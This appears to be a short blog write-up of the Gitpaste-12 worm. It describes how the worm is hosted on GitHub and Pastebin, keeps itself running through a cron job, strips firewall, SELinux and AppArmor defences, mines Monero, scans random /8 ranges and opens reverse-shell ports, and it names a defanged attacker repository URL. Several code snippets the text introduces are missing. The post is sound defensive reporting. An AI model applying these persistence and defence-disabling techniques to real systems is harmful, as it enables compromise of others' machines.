May 29, 2023
GITY Worm

Gitpaste-12 is a new worm recently discovered uses GitHub and Pastebin for housing component code and has at least 12 different attack modules available ways to compromise

The GitHub repository used at the time of discovery was as follows:

https://github[.]com/cnmnmsl-001/-

Gitpaste-12 Core

The first phase of the attack is the initial system compromise .This worm has 12 known attack modules and more under development. The worm will attempt to use known exploits to compromise systems and may also attempt to brute force passwords.

Once compromising a system, the malware sets up a cron job it downloads from Pastebin, which in turn calls the same script and executes it again each minute. This is presumably one mechanism by which updates to the cron jobs can be pushed to the botnet.

The main shell script uploaded during the attack to the victim machine starts to download and execute other components of Gitpaste-12. First, it downloads and sets up cron job, which periodically downloads and executes script from Pastebin:

Next, it downloads from GitHub (https://raw.githubusercontent[.]com/cnmnmsl-001/-/master/shadu1) and executes it.

The malware begins by preparing the environment. This means stripping the system of its defenses, including firewall rules, selinux, apparmor, as well as common attack prevention and monitoring software.

The shadu1 script contains comments in the Chinese language and has multiple commands available to attackers to disable different security capabilities,

Another capability is demonstrated in the ability to run miner for monero cryptocurrency

Worming Spread

The Gitpaste-12 malware also contains a script that launches attacks against other machines, in an attempt to replicate and spread. It chooses a random /8 CIDR for attack and will try all addresses within that range, as demonstrated by this call:

Another version of the script also opens ports 30004 and 30005 for reverse shell commands:

Final thought

No malware is good to have, but worms are particularly annoying. Their ability to spread in an automated fashion can lead to lateral spread within an organization or to your hosts attempting to infect other networks across the internet, resulting in poor reputation for your organization.

Leave a Reply

%d bloggers like this: